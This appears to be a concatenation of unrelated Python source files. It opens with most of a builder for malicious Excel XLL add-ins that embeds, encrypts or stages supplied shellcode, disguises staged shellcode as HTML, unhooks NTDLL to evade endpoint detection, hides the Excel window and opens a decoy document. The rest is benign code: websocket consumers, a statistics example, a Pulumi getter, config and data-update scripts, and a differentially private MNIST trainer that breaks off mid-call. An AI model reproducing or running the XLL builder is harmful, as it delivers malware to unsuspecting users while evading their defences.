STATE_CRLF : { STATE_PAYLOADBODY: 1 }
}
to_encode = base64.urlsafe_b64encode(sc_bytes)
out = ""
current_state = STATE_OPEN
encoded_chars = 0
out += "<html>\n"
while encoded_chars < len(to_encode):
if current_state in [STATE_BODYSPACE, STATE_TAGSPACE]:
out += " "
elif current_state in [STATE_PAYLOADTAG, STATE_PAYLOADBODY]:
out += chr(to_encode[encoded_chars])
encoded_chars += 1
else:
out += current_state
current_state = random.choices(list(transitions[current_state].keys()), list(transitions[current_state].values()))[0]
out += "\n</html>"
return out
def bytes_to_nimarr(bytestr, varname, genconst=False):
byteenum = ""
for i in bytestr:
byteenum += "{0:#04x}, ".format(i)
if genconst:
return "const "+varname+": array[{}, byte] = [byte {}]".format(len(bytestr), byteenum[:-2])
return "var "+varname+": array[{}, byte] = [byte {}]".format(len(bytestr), byteenum[:-2])
parser = argparse.ArgumentParser()
staging = parser.add_argument_group('staging arguments')
staging.add_argument("-u", "--stageurl", type=str,
help="URL to stage from (if staged, optional)")
stageless = parser.add_argument_group('stageless arguments')
stageless.add_argument("-e", "--encrypt", action="store_true",
help="encrypt shellcode (aes128-cbc)")
compilation = parser.add_argument_group('compilation arguments')
compilation.add_argument("-n", "--skip-unhook", action="store_true",
help="do not do NTDLL unhooking")
compilation.add_argument("-w", "--hidewindow", action="store_true",
help="hide excel window during execution")
compilation.add_argument("-d", "--decoy", type=str,
help="path to the decoy file to open on startup (optional)")
compilation.add_argument("-v", "--verbose", action="store_true",
help="increase output verbosity")
compilation.add_argument("-o", "--output", type=str, default="addin.xll",
help="path to store the resulting .XLL file (optional)")
required = parser.add_argument_group('required arguments')
required.add_argument("-s", "--shellcode", type=str,
help="path to shellcode .bin (required)", required=True)
args = parser.parse_args()
with open("xll_template.nim", "r") as f:
template_str = f.read()
compile_template = "nim c --app:lib --passL:\"-static-libgcc -static -lpthread\" --hints:off --define:excel {cmdline_args} --nomain --out:{outfile} --threads:on {filename}"
cmdline_args = ""
if os.name != 'nt':
print("| cross-compilation unstable")
cmdline_args += "--define:mingw --cpu:amd64 "
if not args.skip_unhook:
cmdline_args += "--define:unhook "
print("| NTDLL unhooking: on")
else:
print("| NTDLL unhooking: off")
if args.hidewindow:
cmdline_args += "--define:hidewindow "
print("| hide excel window: on")
else:
print("| hide excel window: off")
print("| release mode: off")
if args.stageurl is None:
if args.encrypt:
print("| generating stageless payload")
print("| encryption: on")
cmdline_args += "--define:encrypted "
with open(args.shellcode, "rb") as f:
scode_bytes = f.read()
key = os.urandom(16)
iv = os.urandom(16)
ctr = Counter.new(128, initial_value=int(hexlify(iv), 16))
cipher = AES.new(key, AES.MODE_CTR, counter=ctr)
encdata = cipher.encrypt(scode_bytes)
xll_nim = template_str.replace("#[ KEY_STR ]#", bytes_to_nimarr(key, "aeskey", True))
xll_nim = xll_nim.replace("#[ IV_STR ]#", bytes_to_nimarr(iv, "aesiv", True))
xll_nim = xll_nim.replace("#[ ENC_SC ]#", bytes_to_nimarr(encdata, "aesdata", True))
else:
print("| generating stageless payload")
print("| encryption: off")
with open(args.shellcode, "rb") as f:
scode_bytes = f.read()
bytes_template = bytes_to_nimarr(scode_bytes, "shellcode")
xll_nim = template_str.replace('echo "%SHELLCODE_ARRAY%"', bytes_template)
else:
print("| generating staged payload")
cmdline_args += "--define:staged "
if args.verbose:
print(" \\ URL:", args.stageurl)
with open(args.shellcode, "rb") as f:
scode_bytes = f.read()
with open(args.shellcode+".html", "w") as f:
f.write(encode_shellcode(scode_bytes))
print("| encoded shellcode saved as", args.shellcode+".html")
xll_nim = template_str.replace('%STAGINGURL%', args.stageurl)
if args.decoy is not None:
print("| decoy file:", args.decoy)
xll_nim = xll_nim.replace("%DECOYFILE%", os.path.split(args.decoy)[1])
xll_nim = xll_nim.replace("%DECOYPATH%", args.decoy)
cmdline_args += "--define:decoy "
tempname = "temp_xll_{}.nim".format(random.randint(1,50))
with open(tempname, "w") as f:
f.write(xll_nim)
if args.verbose:
print(" \\ command line:", compile_template.format(cmdline_args=cmdline_args, outfile=args.output, filename=tempname))
os.system(compile_template.format(cmdline_args=cmdline_args, outfile=args.output, filename=tempname))
os.remove(tempname)
print("! should be saved to: ", args.output)
|
from mkcommit import CommitMessage, editor, to_stdout
def commit():
return CommitMessage("whatever", editor())
if __name__ == "__main__":
to_stdout(commit())
|
"""Channel consumers."""
import json
from channels import Group
from channels.auth import channel_session_user, channel_session_user_from_http
from rest_framework.renderers import JSONRenderer
from .actions import send_real_person_status, send_scenes_status, send_units_status, STATUS_GROUP
@channel_session_user_from_http
def ws_connect(message):
"""Add only authenticated users to the channel group."""
if message.user.is_authenticated():
message.reply_channel.send({'accept': True})
send_real_person_status(channel=message.reply_channel)
send_units_status(channel=message.reply_channel)
send_scenes_status(channel=message.reply_channel)
Group(STATUS_GROUP).add(message.reply_channel)
else:
message.reply_channel.send({
'text': JSONRenderer().render({
'error': 403
}).decode('utf-8')
})
message.reply_channel.send({'close': True})
@channel_session_user
def ws_receive(message):
"""Receive messages from the websocket."""
try:
data = json.loads(message.content['text'])
except json.JSONDecodeError:
message.reply_channel.send({
'text': JSONRenderer().render({
'error': 'unable to parse JSON message'
}).decode('utf-8')
})
else:
if 'action' in data:
if data['action'] == 'status':
send_units_status(channel=message.reply_channel)
else:
message.reply_channel.send({
'text': JSONRenderer().render({
'error': 'unknown action'
}).decode('utf-8')
})
@channel_session_user
def ws_disconnect(message):
"""Remove sockets from the group."""
Group(STATUS_GROUP).discard(message.reply_channel)
|
from pystats import *
mean = 3.95 # mean of the samples
stddev = 0.1 # standard deviation of the samples
lower_bound = 3.9
upper_bound = 4.1
print('Fraction under lower bound [ P(X <= {:1.4f}) ] = {:1.4f}'.format(lower_bound, pnorm(lower_bound, mean, stddev)))
print('Fraction over upper bound [ P(X > {:1.4f}) ] = {:1.4f}'.format(upper_bound, 1-pnorm(upper_bound, mean, stddev)))
frac = pnorm(upper_bound, mean, stddev) - pnorm(lower_bound, mean, stddev)
print('Fraction between both bounds [ P({:1.4f} <= X <= {:1.4f}) ] = {:1.4f}'.format(lower_bound, upper_bound, frac))
print('95% of samples are under {:1.4f}'.format(qnorm(0.95, mean, stddev)))
|
# import pandas as pd
# import numpy as np
# import matplotlib.pyplot as plt
# df = pd.read_csv('C:\\Yitian\\FS_CE_NETS_Py\\1.csv')
# #df=df.to_excel('C:\Yitian\FS_Cascading_Events_NETS\Frequency Response.xlsx', 'Line_02-03_Outage', index=False)
# x=df.ix[2:2000,'Results']
# #Titles = np.array(df.loc[-1, :])
# #x = np.array(df.loc[3:, 1])
# #print(Titles)
# for i in range(1,34):
# a='bus',i
# print(a)
# y = df.loc[2:2000, a]
# plt.plot(x, y, label = a, linewidth = 0.2)
# plt.xlabel('Time')
# plt.ylabel('Frequency Response')
# plt.title('Frequency Responses')
# plt.legend()
# plt.xticks(range(0, 20, 5))
# #plt.yticks(range(0, 2, 0.01))
# plt.show()
def read_excel(file, sheet, row1, row2, col1, col2, sf):
import xlrd
import numpy as np
# file = 'ACTIVSg200.xlsx'
list_data = []
wb = xlrd.open_workbook(filename = file)
sheet1 = wb.sheet_by_name(sheet)
rows = sheet1.row_values(2)
for j in range(col1 - 1, col2) :
data = []
for i in range(row1 - 1, row2) :
if sheet1.cell(i,j).ctype == 2 :
data.append(float(sheet1.cell(i,j).value) * sf)
else:
data.append(sheet1.cell(i,j).value)
list_data.append(data)
datamatrix = np.array(list_data)
return datamatrix
# # test
# import itertools
# import numpy as np
# data = read_excel('Line Parameters', 3, 36, 1, 3, 1.0)
# Lines = [1, 2, 3, 4, 6, 7, 8, 9, 10, 11, 12, 13, 15, 16, 17, 18, 19, 23, 24, 25, 26, 27, 28, 29, 30, 31, 35, 36, 38, 40, 42, 43, 44, 45]
# p1= []
# p2 =[]
# for lines in itertools.combinations(Lines, 2):
# p1.append(lines[0])
# p1.append(lines[1])
# p2.append(p1)
# p1= []
# P= np.array(p2)
# print(p2)
# print(len(p2))
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
__all__ = [
'GetEvaluationJobResult',
'AwaitableGetEvaluationJobResult',
'get_evaluation_job',
'get_evaluation_job_output',
]
@pulumi.output_type
class GetEvaluationJobResult:
def __init__(__self__, annotation_spec_set=None, attempts=None, create_time=None, description=None, evaluation_job_config=None, label_missing_ground_truth=None, model_version=None, name=None, schedule=None, state=None):
if annotation_spec_set and not isinstance(annotation_spec_set, str):
raise TypeError("Expected argument 'annotation_spec_set' to be a str")
pulumi.set(__self__, "annotation_spec_set", annotation_spec_set)
if attempts and not isinstance(attempts, list):
raise TypeError("Expected argument 'attempts' to be a list")
pulumi.set(__self__, "attempts", attempts)
if create_time and not isinstance(create_time, str):
raise TypeError("Expected argument 'create_time' to be a str")
pulumi.set(__self__, "create_time", create_time)
if description and not isinstance(description, str):
raise TypeError("Expected argument 'description' to be a str")
pulumi.set(__self__, "description", description)
if evaluation_job_config and not isinstance(evaluation_job_config, dict):
raise TypeError("Expected argument 'evaluation_job_config' to be a dict")
pulumi.set(__self__, "evaluation_job_config", evaluation_job_config)
if label_missing_ground_truth and not isinstance(label_missing_ground_truth, bool):
raise TypeError("Expected argument 'label_missing_ground_truth' to be a bool")
pulumi.set(__self__, "label_missing_ground_truth", label_missing_ground_truth)
if model_version and not isinstance(model_version, str):
raise TypeError("Expected argument 'model_version' to be a str")
pulumi.set(__self__, "model_version", model_version)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if schedule and not isinstance(schedule, str):
raise TypeError("Expected argument 'schedule' to be a str")
pulumi.set(__self__, "schedule", schedule)
if state and not isinstance(state, str):
raise TypeError("Expected argument 'state' to be a str")
pulumi.set(__self__, "state", state)
@property
@pulumi.getter(name="annotationSpecSet")
def annotation_spec_set(self) -> str:
"""
Name of the AnnotationSpecSet describing all the labels that your machine learning model outputs. You must create this resource before you create an evaluation job and provide its name in the following format: "projects/{project_id}/annotationSpecSets/{annotation_spec_set_id}"
"""
return pulumi.get(self, "annotation_spec_set")
@property
@pulumi.getter
def attempts(self) -> Sequence['outputs.GoogleCloudDatalabelingV1beta1AttemptResponse']:
"""
Every time the evaluation job runs and an error occurs, the failed attempt is appended to this array.
"""
return pulumi.get(self, "attempts")
@property
@pulumi.getter(name="createTime")
def create_time(self) -> str:
"""
Timestamp of when this evaluation job was created.
"""
return pulumi.get(self, "create_time")
@property
@pulumi.getter
def description(self) -> str:
"""
Description of the job. The description can be up to 25,000 characters long.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="evaluationJobConfig")
def evaluation_job_config(self) -> 'outputs.GoogleCloudDatalabelingV1beta1EvaluationJobConfigResponse':
"""
Configuration details for the evaluation job.
"""
return pulumi.get(self, "evaluation_job_config")
@property
@pulumi.getter(name="labelMissingGroundTruth")
def label_missing_ground_truth(self) -> bool:
"""
Whether you want Data Labeling Service to provide ground truth labels for prediction input. If you want the service to assign human labelers to annotate your data, set this to `true`. If you want to provide your own ground truth labels in the evaluation job's BigQuery table, set this to `false`.
"""
return pulumi.get(self, "label_missing_ground_truth")
@property
@pulumi.getter(name="modelVersion")
def model_version(self) -> str:
"""
The [AI Platform Prediction model version](/ml-engine/docs/prediction-overview) to be evaluated. Prediction input and output is sampled from this model version. When creating an evaluation job, specify the model version in the following format: "projects/{project_id}/models/{model_name}/versions/{version_name}" There can only be one evaluation job per model version.
"""
return pulumi.get(self, "model_version")
@property
@pulumi.getter
def name(self) -> str:
"""
After you create a job, Data Labeling Service assigns a name to the job with the following format: "projects/{project_id}/evaluationJobs/ {evaluation_job_id}"
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def schedule(self) -> str:
"""
Describes the interval at which the job runs. This interval must be at least 1 day, and it is rounded to the nearest day. For example, if you specify a 50-hour interval, the job runs every 2 days. You can provide the schedule in [crontab format](/scheduler/docs/configuring/cron-job-schedules) or in an [English-like format](/appengine/docs/standard/python/config/cronref#schedule_format). Regardless of what you specify, the job will run at 10:00 AM UTC. Only the interval from this schedule is used, not the specific time of day.
"""
return pulumi.get(self, "schedule")
@property
@pulumi.getter
def state(self) -> str:
"""
Describes the current state of the job.
"""
return pulumi.get(self, "state")
class AwaitableGetEvaluationJobResult(GetEvaluationJobResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetEvaluationJobResult(
annotation_spec_set=self.annotation_spec_set,
attempts=self.attempts,
create_time=self.create_time,
description=self.description,
evaluation_job_config=self.evaluation_job_config,
label_missing_ground_truth=self.label_missing_ground_truth,
model_version=self.model_version,
name=self.name,
schedule=self.schedule,
state=self.state)
def get_evaluation_job(evaluation_job_id: Optional[str] = None,
project: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetEvaluationJobResult:
"""
Gets an evaluation job by resource name.
"""
__args__ = dict()
__args__['evaluationJobId'] = evaluation_job_id
__args__['project'] = project
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('google-native:datalabeling/v1beta1:getEvaluationJob', __args__, opts=opts, typ=GetEvaluationJobResult).value
return AwaitableGetEvaluationJobResult(
annotation_spec_set=__ret__.annotation_spec_set,
attempts=__ret__.attempts,
create_time=__ret__.create_time,
description=__ret__.description,
evaluation_job_config=__ret__.evaluation_job_config,
label_missing_ground_truth=__ret__.label_missing_ground_truth,
model_version=__ret__.model_version,
name=__ret__.name,
schedule=__ret__.schedule,
state=__ret__.state)
@_utilities.lift_output_func(get_evaluation_job)
def get_evaluation_job_output(evaluation_job_id: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[Optional[str]]] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetEvaluationJobResult]:
"""
Gets an evaluation job by resource name.
"""
...
|
# python mysql
from configparser import RawConfigParser, Error
import os
def readConfig():
"""
Return
------
`(variable) config: ConfigParser`
"""
# Deal with path issue
folder = os.path.dirname(os.path.abspath(__file__))
config_file = os.path.join(folder, 'localConfig.env')
config = RawConfigParser()
res = config.read(config_file)
return config
if __name__ == "__main__":
config = readConfig()
print(config)
print(config.get('DB', 'host')) |
#!/usr/bin/env python2.7
"""
update_dreqs_0012.py
This script is run to update the version on two of the CNRM-CM6-1-HR to the
same as the first submission. The files for these two submissions are then
copied to the same directory and the directory value for that file is updated
to the new path.
"""
import argparse
from datetime import datetime
import logging.config
import sys
from cf_units import date2num, CALENDAR_360_DAY
import django
django.setup()
from django.core.exceptions import MultipleObjectsReturned, ObjectDoesNotExist
from pdata_app.models import DataSubmission, DataFile
__version__ = '0.1.0b1'
DEFAULT_LOG_LEVEL = logging.WARNING
DEFAULT_LOG_FORMAT = '%(levelname)s: %(message)s'
logger = logging.getLogger(__name__)
NEW_VERSION = 'v20170623'
def parse_args():
"""
Parse command-line arguments
"""
parser = argparse.ArgumentParser(description='Add additional data requests')
parser.add_argument('-l', '--log-level', help='set logging level to one of '
'debug, info, warn (the default), or error')
parser.add_argument('--version', action='version',
version='%(prog)s {}'.format(__version__))
args = parser.parse_args()
return args
def main(args):
"""
Main entry point
"""
data_subs = [
{'dir': '/group_workspaces/jasmin2/primavera4/upload/CNRM-CERFACS/'
'CNRM-CM6-1-HR/incoming/v20170518_1970',
'version': 'v20170622'},
{'dir': '/group_workspaces/jasmin2/primavera4/upload/CNRM-CERFACS/'
'CNRM-CM6-1-HR/incoming/v20170518_1960',
'version': 'v20170703'}
]
for data_sub_dict in data_subs:
try:
data_sub = DataSubmission.objects.get(
incoming_directory=data_sub_dict['dir'])
except MultipleObjectsReturned:
logger.error('Multiple submissions found for {}'.
format(data_sub_dict['dir']))
except ObjectDoesNotExist:
logger.error('No submissions found for {}'.
format(data_sub_dict['dir']))
for data_file in data_sub.datafile_set.all():
data_file.version
if __name__ == "__main__":
cmd_args = parse_args()
# determine the log level
if cmd_args.log_level:
try:
log_level = getattr(logging, cmd_args.log_level.upper())
except AttributeError:
logger.setLevel(logging.WARNING)
logger.error('log-level must be one of: debug, info, warn or error')
sys.exit(1)
else:
log_level = DEFAULT_LOG_LEVEL
# configure the logger
logging.config.dictConfig({
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'standard': {
'format': DEFAULT_LOG_FORMAT,
},
},
'handlers': {
'default': {
'level': log_level,
'class': 'logging.StreamHandler',
'formatter': 'standard'
},
},
'loggers': {
'': {
'handlers': ['default'],
'level': log_level,
'propagate': True
}
}
})
# run the code
main(cmd_args)
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Example differentially private trainer and evaluator for MNIST.
"""
from __future__ import division
import json
import os
import sys
import time
import numpy as np
from six.moves import xrange
import tensorflow as tf
from differential_privacy.dp_sgd.dp_optimizer import dp_optimizer
from differential_privacy.dp_sgd.dp_optimizer import dp_pca
from differential_privacy.dp_sgd.dp_optimizer import sanitizer
from differential_privacy.dp_sgd.dp_optimizer import utils
from differential_privacy.privacy_accountant.tf import accountant
# parameters for the training
tf.flags.DEFINE_integer("batch_size", 600,
"The training batch size.")
tf.flags.DEFINE_integer("batches_per_lot", 1,
"Number of batches per lot.")
# Together, batch_size and batches_per_lot determine lot_size.
tf.flags.DEFINE_integer("num_training_steps", 50000,
"The number of training steps."
"This counts number of lots.")
tf.flags.DEFINE_bool("randomize", True,
"If true, randomize the input data; otherwise use a fixed "
"seed and non-randomized input.")
tf.flags.DEFINE_bool("freeze_bottom_layers", False,
"If true, only train on the logit layer.")
tf.flags.DEFINE_bool("save_mistakes", False,
"If true, save the mistakes made during testing.")
tf.flags.DEFINE_float("lr", 0.05, "start learning rate")
tf.flags.DEFINE_float("end_lr", 0.05, "end learning rate")
tf.flags.DEFINE_float("lr_saturate_epochs", 0,
"learning rate saturate epochs; set to 0 for a constant "
"learning rate of --lr.")
# For searching parameters
tf.flags.DEFINE_integer("projection_dimensions", 60,
"PCA projection dimensions, or 0 for no projection.")
tf.flags.DEFINE_integer("num_hidden_layers", 1,
"Number of hidden layers in the network")
tf.flags.DEFINE_integer("hidden_layer_num_units", 1000,
"Number of units per hidden layer")
tf.flags.DEFINE_float("default_gradient_l2norm_bound", 4.0, "norm clipping")
tf.flags.DEFINE_integer("num_conv_layers", 0,
"Number of convolutional layers to use.")
tf.flags.DEFINE_string("training_data_path",
"/tmp/mnist/mnist_train.tfrecord",
"Location of the training data.")
tf.flags.DEFINE_string("eval_data_path",
"/tmp/mnist/mnist_test.tfrecord",
"Location of the eval data.")
tf.flags.DEFINE_integer("eval_steps", 10,
"Evaluate the model every eval_steps")
# Parameters for privacy spending. We allow linearly varying eps during
# training.
tf.flags.DEFINE_string("accountant_type", "Moments", "Moments, Amortized.")
# Flags that control privacy spending during training.
tf.flags.DEFINE_float("eps", 1.0,
"Start privacy spending for one epoch of training, "
"used if accountant_type is Amortized.")
tf.flags.DEFINE_float("end_eps", 1.0,
"End privacy spending for one epoch of training, "
"used if accountant_type is Amortized.")
tf.flags.DEFINE_float("eps_saturate_epochs", 0,
"Stop varying epsilon after eps_saturate_epochs. Set to "
"0 for constant eps of --eps. "
"Used if accountant_type is Amortized.")
tf.flags.DEFINE_float("delta", 1e-5,
"Privacy spending for training. Constant through "
"training, used if accountant_type is Amortized.")
tf.flags.DEFINE_float("sigma", 4.0,
"Noise sigma, used only if accountant_type is Moments")
# Flags that control privacy spending for the pca projection
# (only used if --projection_dimensions > 0).
tf.flags.DEFINE_float("pca_eps", 0.5,
"Privacy spending for PCA, used if accountant_type is "
"Amortized.")
tf.flags.DEFINE_float("pca_delta", 0.005,
"Privacy spending for PCA, used if accountant_type is "
"Amortized.")
tf.flags.DEFINE_float("pca_sigma", 7.0,
"Noise sigma for PCA, used if accountant_type is Moments")
tf.flags.DEFINE_string("target_eps", "0.125,0.25,0.5,1,2,4,8",
"Log the privacy loss for the target epsilon's. Only "
"used when accountant_type is Moments.")
tf.flags.DEFINE_float("target_delta", 1e-5,
"Maximum delta for --terminate_based_on_privacy.")
tf.flags.DEFINE_bool("terminate_based_on_privacy", False,
"Stop training if privacy spent exceeds "
"(max(--target_eps), --target_delta), even "
"if --num_training_steps have not yet been completed.")
tf.flags.DEFINE_string("save_path", "/tmp/mnist_dir",
"Directory for saving model outputs.")
FLAGS = tf.flags.FLAGS
NUM_TRAINING_IMAGES = 60000
NUM_TESTING_IMAGES = 10000
IMAGE_SIZE = 28
def MnistInput(mnist_data_file, batch_size, randomize):
"""Create operations to read the MNIST input file.
Args:
mnist_data_file: Path of a file containing the MNIST images to process.
batch_size: size of the mini batches to generate.
randomize: If true, randomize the dataset.
Returns:
images: A tensor with the formatted image data. shape [batch_size, 28*28]
labels: A tensor with the labels for each image. shape [batch_size]
"""
file_queue = tf.train.string_input_producer([mnist_data_file])
reader = tf.TFRecordReader()
_, value = reader.read(file_queue)
example = tf.parse_single_example(
value,
features={"image/encoded": tf.FixedLenFeature(shape=(), dtype=tf.string),
"image/class/label": tf.FixedLenFeature([1], tf.int64)})
image = tf.cast(tf.image.decode_png(example["image/encoded"], channels=1),
tf.float32)
image = tf.reshape(image, [IMAGE_SIZE * IMAGE_SIZE])
image /= 255
label = tf.cast(example["image/class/label"], dtype=tf.int32)
label = tf.reshape(label, [])
if randomize:
images, labels = tf.train.shuffle_batch(
[image, label], batch_size=batch_size,
capacity=(batch_size * 100),
min_after_dequeue=(batch_size * 10))
else:
images, labels = tf.train.batch([image, label], batch_size=batch_size)
return images, labels
def Eval(mnist_data_file, network_parameters, num_testing_images,
randomize, load_path, save_mistakes=False):
"""Evaluate MNIST for a number of steps.
Args:
mnist_data_file: Path of a file containing the MNIST images to process.
network_parameters: parameters for defining and training the network.
num_testing_images: the number of images we will evaluate on.
randomize: if false, randomize; otherwise, read the testing images
sequentially.
load_path: path where to load trained parameters from.
save_mistakes: save the mistakes if True.
Returns:
The evaluation accuracy as a float.
"""
batch_size = 100
# Like for training, we need a session for executing the TensorFlow graph.
with tf.Graph().as_default(), tf.Session() as sess:
# Create the basic Mnist model.
images, labels = MnistInput(mnist_data_file, batch_size, randomize)
logits, _, _ = utils.BuildNetwork(images, network_parameters)
softmax = tf.nn.softmax(logits)
# Load the variables.
ckpt_state = tf.train.get_checkpoint_state(load_path)
if not (ckpt_state and ckpt_state.model_checkpoint_path):
raise ValueError("No model checkpoint to eval at %s\n" % load_path)
saver = tf.train.Saver()
saver.restore(sess, ckpt_state.model_checkpoint_path)
coord = tf.train.Coordinator()
_ = tf.train.start_queue_runners(sess=sess, coord=coord)
total_examples = 0
correct_predictions = 0
image_index = 0
mistakes = []
for _ in xrange((num_testing_images + batch_size - 1) // batch_size):
predictions, label_values = sess.run([softmax, labels])
# Count how many were predicted correctly.
for prediction, label_value in zip(predictions, label_values):
total_examples += 1
if np.argmax(prediction) == label_value:
correct_predictions += 1
elif save_mistakes:
mistakes.append({"index": image_index,
"label": label_value,
"pred": np.argmax(prediction)})
image_index += 1
return (correct_predictions / total_examples,
mistakes if save_mistakes else None)
def Train(mnist_train_file, mnist_test_file, network_parameters, num_steps,
save_path, eval_steps=0):
"""Train MNIST for a number of steps.
Args:
mnist_train_file: path of MNIST train data file.
mnist_test_file: path of MNIST test data file.
network_parameters: parameters for defining and training the network.
num_steps: number of steps to run. Here steps = lots
save_path: path where to save trained parameters.
eval_steps: evaluate the model every eval_steps.
Returns:
the result after the final training step.
Raises:
ValueError: if the accountant_type is not supported.
"""
batch_size = FLAGS.batch_size
params = {"accountant_type": FLAGS.accountant_type,
"task_id": 0,
"batch_size": FLAGS.batch_size,
"projection_dimensions": FLAGS.projection_dimensions,
"default_gradient_l2norm_bound":
network_parameters.default_gradient_l2norm_bound,
"num_hidden_layers": FLAGS.num_hidden_layers,
"hidden_layer_num_units": FLAGS.hidden_layer_num_units,
"num_examples": NUM_TRAINING_IMAGES,
"learning_rate": FLAGS.lr,
"end_learning_rate": FLAGS.end_lr,
"learning_rate_saturate_epochs": FLAGS.lr_saturate_epochs
}
# Log different privacy parameters dependent on the accountant type.
if FLAGS.accountant_type == "Amortized":
params.update({"flag_eps": FLAGS.eps,
"flag_delta": FLAGS.delta,
"flag_pca_eps": FLAGS.pca_eps,
"flag_pca_delta": FLAGS.pca_delta,
})
elif FLAGS.accountant_type == "Moments":
params.update({"sigma": FLAGS.sigma,
"pca_sigma": FLAGS.pca_sigma,
})
with tf.Graph().as_default(), tf.Session() as sess, tf.device('/cpu:0'):
# Create the basic Mnist model.
images, labels = MnistInput(mnist_train_file, batch_size, FLAGS.randomize)
logits, projection, training_params = utils.BuildNetwork(
images, network_parameters)
cost = tf.nn.softmax_cross_entropy_with_logits(
logits=logits, labels=tf.one_hot(labels, 10))
# The actual cost is the average across the examples.
cost = tf.reduce_sum(cost, [0]) / batch_size
if FLAGS.accountant_type == "Amortized":
priv_accountant = accountant.AmortizedAccountant(NUM_TRAINING_IMAGES)
sigma = None
pca_sigma = None
with_privacy = FLAGS.eps > 0
elif FLAGS.accountant_type == "Moments":
priv_accountant = accountant.GaussianMomentsAccountant(
NUM_TRAINING_IMAGES)
sigma = FLAGS.sigma
pca_sigma = FLAGS.pca_sigma
with_privacy = FLAGS.sigma > 0
else:
raise ValueError("Undefined accountant type, needs to be "
"Amortized or Moments, but got %s" % FLAGS.accountant)
# Note: Here and below, we scale down the l2norm_bound by
# batch_size. This is because per_example_gradients computes the
# gradient of the minibatch loss with respect to each individual
# example, and the minibatch loss (for our model) is the *average*
# loss over examples in the minibatch. Hence, the scale of the
# per-example gradients goes like 1 / batch_size.
gaussian_sanitizer = sanitizer.AmortizedGaussianSanitizer(
priv_accountant,
[network_parameters.default_gradient_l2norm_bound / batch_size, True])
for var in training_params:
if "gradient_l2norm_bound" in training_params[var]:
l2bound = training_params[var]["gradient_l2norm_bound"] / batch_size
gaussian_sanitizer.set_option(var,
sanitizer.ClipOption(l2bound, True))
lr = tf.placeholder(tf.float32)
eps = tf.placeholder(tf.float32)
delta = tf.placeholder(tf.float32)
init_ops = []
if network_parameters.projection_type == "PCA":
with tf.variable_scope("pca"):
# Compute differentially private PCA.
all_data, _ = MnistInput(mnist_train_file, NUM_TRAINING_IMAGES, False)
pca_projection = dp_pca.ComputeDPPrincipalProjection(
all_data, network_parameters.projection_dimensions,
gaussian_sanitizer, [FLAGS.pca_eps, FLAGS.pca_delta], pca_sigma)
assign_pca_proj = tf.assign(projection, pca_projection)
init_ops.append(assign_pca_proj)
# Add global_step
global_step = tf.Variable(0, dtype=tf.int32, trainable=False,
name="global_step")
if with_privacy:
gd_op = dp_optimizer.DPGradientDescentOptimizer(
lr,
[eps, delta],
gaussian_sanitizer,
sigma=sigma,
batches_per_lot=FLAGS.batches_per_lot).minimize(
cost, global_step=global_step)
else:
gd_op = tf.train.GradientDescentOptimizer(lr).minimize(cost)
saver = tf.train.Saver()
coord = tf.train.Coordinator()
_ = tf.train.start_queue_runners(sess=sess, coord=coord)
# We need to maintain the intialization sequence.
for v in tf.trainable_variables():
sess.run(tf.variables_initializer([v]))
sess.run(tf.global_variables_initializer())
sess.run(init_ops)
results = []
start_time = time.time()
prev_time = start_time
filename = "results-0.json"
log_path = os.path.join(save_path, filename)
target_eps = [float(s) for s in FLAGS.target_eps.split(",")]
if FLAGS.accountant_type == "Amortized":
# Only matters if --terminate_based_on_privacy is true.
target_eps = [max(target_eps)]
max_target_eps = max(target_eps)
lot_size = FLAGS.batches_per_lot * FLAGS.batch_size
lots_per_epoch = NUM_TRAINING_IMAGES / lot_size
for step in xrange(num_steps):
epoch = step / lots_per_epoch
curr_lr = utils.VaryRate(FLAGS.lr, FLAGS.end_lr,
FLAGS.lr_saturate_epochs, epoch)
curr_eps = utils.VaryRate(FLAGS.eps, FLAGS.end_eps,
FLAGS.eps_saturate_epochs, epoch)
for _ in xrange(FLAGS.batches_per_lot):
_ = sess.run(
[gd_op], feed_dict={lr: curr_lr, eps: curr_eps, delta: FLAGS.delta})
sys.stderr.write("step: %d\n" % step)
# See if we should stop training due to exceeded privacy budget:
should_terminate = False
terminate_spent_eps_delta = None
if with_privacy and FLAGS.terminate_based_on_privacy:
terminate_spent_eps_delta = priv_accountant.get_privacy_spent(
sess, target_eps=[max_target_eps])[0]
# For the Moments accountant, we should always have
# spent_eps == max_target_eps.
if (terminate_spent_eps_delta.spent_delta > FLAGS.target_delta or
terminate_spent_eps_delta.spent_eps > max_target_eps):
should_terminate = True
if (eval_steps > 0 and (step + 1) % eval_steps == 0) or should_terminate:
if with_privacy:
spent_eps_deltas = priv_accountant.get_privacy_spent(
sess, target_eps=target_eps)
else:
spent_eps_deltas = [accountant.EpsDelta(0, 0)]
for spent_eps, spent_delta in spent_eps_deltas:
sys.stderr.write("spent privacy: eps %.4f delta %.5g\n" % (
spent_eps, spent_delta))
saver.save(sess, save_path=save_path + "/ckpt")
train_accuracy, _ = Eval(mnist_train_file, network_parameters,
num_testing_images=NUM_TESTING_IMAGES,
randomize=True, load_path=save_path)
sys.stderr.write("train_accuracy: %.2f\n" % train_accuracy)
test_accuracy, mistakes = Eval(mnist_test_file, network_parameters,
num_testing_images=NUM_TESTING_IMAGES,
randomize=False, load_path=save_path,
